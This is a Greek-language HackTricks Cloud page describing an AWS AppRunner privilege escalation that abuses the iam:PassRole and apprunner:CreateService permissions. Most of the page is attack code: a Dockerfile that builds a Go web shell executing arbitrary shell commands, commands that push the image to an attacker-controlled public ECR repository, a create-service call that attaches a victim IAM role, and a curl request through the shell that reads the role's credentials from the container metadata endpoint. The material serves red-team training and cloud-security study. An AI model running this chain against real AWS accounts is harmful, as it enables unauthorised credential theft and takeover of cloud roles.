HackTricks CloudAWS - AppRunner Privesc
Tip
Μάθετε & εξασκηθείτε στο AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Μάθετε & εξασκηθείτε στο GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Μάθετε & εξασκηθείτε στο Az Hacking:HackTricks Training Azure Red Team Expert (AzRTE)
Υποστηρίξτε το HackTricks
- Δείτε τα subscription plans!
- Εγγραφείτε στο 💬 Discord group ή την telegram group ή ακολουθήστε μας στο Twitter 🐦 @hacktricks_live.
- Μοιραστείτε τα hacking tricks υποβάλλοντας PRs στα HackTricks και HackTricks Cloud github repos.
AppRunner
iam:PassRole, apprunner:CreateService
Ένας attacker με αυτά τα permissions μπορεί να δημιουργήσει μια υπηρεσία AppRunner με συνημμένο IAM role, ενδεχομένως escalating privileges αποκτώντας πρόσβαση στα credentials του role.
Ο attacker πρώτα δημιουργεί ένα Dockerfile που λειτουργεί ως web shell για εκτέλεση αυθαίρετων εντολών στο AppRunner container.
FROM golang:1.24-bookworm
WORKDIR /app
RUN apt-get update && apt-get install -y ca-certificates curl
RUN cat <<'EOF' > main.go
package main
import (
"fmt"
"net/http"
"os/exec"
)
func main() {
http.HandleFunc("/", func(w http.ResponseWriter, r *http.Request) {
command := exec.Command("sh", "-c", r.URL.Query().Get("cmd"))
output, err := command.CombinedOutput()
if err != nil {
fmt.Fprint(w, err.Error(), output)
return
}
fmt.Fprint(w, string(output))
})
http.ListenAndServe("0.0.0.0:3000", nil)
}
EOF
RUN go mod init test && go build -o main .
EXPOSE 3000
CMD ["./main"]
Στη συνέχεια, προώθησε αυτή την εικόνα σε ένα ECR repository. Με την προώθηση της εικόνας σε ένα δημόσιο repository σε ένα AWS account που ελέγχεται από τον attacker, είναι δυνατή η privilege escalation ακόμα κι αν ο λογαριασμός του victim δεν έχει δικαιώματα να χειριστεί το ECR.
IMAGE_NAME=public.ecr.aws/<alias>/<namespace>/<repo-name>:latest
docker buildx build --platform linux/amd64 -t $IMAGE_NAME .
aws ecr-public get-login-password | docker login --username AWS --password-stdin public.ecr.aws
docker push $IMAGE_NAME
docker logout public.ecr.aws
Στη συνέχεια, ο επιτιθέμενος δημιουργεί μια υπηρεσία AppRunner ρυθμισμένη με αυτό το web shell image και το IAM Role που θέλει να εκμεταλλευτεί.
aws apprunner create-service \
--service-name malicious-service \
--source-configuration '{
"ImageRepository": {
"ImageIdentifier": "public.ecr.aws/<alias>/<namespace>/<repo-name>:latest",
"ImageRepositoryType": "ECR_PUBLIC",
"ImageConfiguration": { "Port": "3000" }
}
}' \
--instance-configuration '{"InstanceRoleArn": "arn:aws:iam::123456789012:role/AppRunnerRole"}' \
--query Service.ServiceUrl
Αφού περιμένετε να ολοκληρωθεί η δημιουργία της υπηρεσίας, χρησιμοποιήστε το web shell για να ανακτήσετε τα container credentials και να αποκτήσετε τα permissions του IAM Role που είναι επισυναπτόμενο στο AppRunner.
curl 'https://<service-url>/?cmd=curl+http%3A%2F%2F169.254.170.2%24AWS_CONTAINER_CREDENTIALS_RELATIVE_URI'
Πιθανός Αντίκτυπος: Άμεση κλιμάκωση προνομίων σε οποιοδήποτε IAM role που μπορεί να επισυναφθεί σε υπηρεσίες AppRunner.
Tip
Μάθετε & εξασκηθείτε στο AWS Hacking:
Μάθετε & εξασκηθείτε στο GCP Hacking:
Μάθετε & εξασκηθείτε στο Az Hacking:Υποστηρίξτε το HackTricks
- Δείτε τα subscription plans!
- Εγγραφείτε στο 💬 Discord group ή την telegram group ή ακολουθήστε μας στο Twitter 🐦 @hacktricks_live.
- Μοιραστείτε τα hacking tricks υποβάλλοντας PRs στα HackTricks και HackTricks Cloud github repos.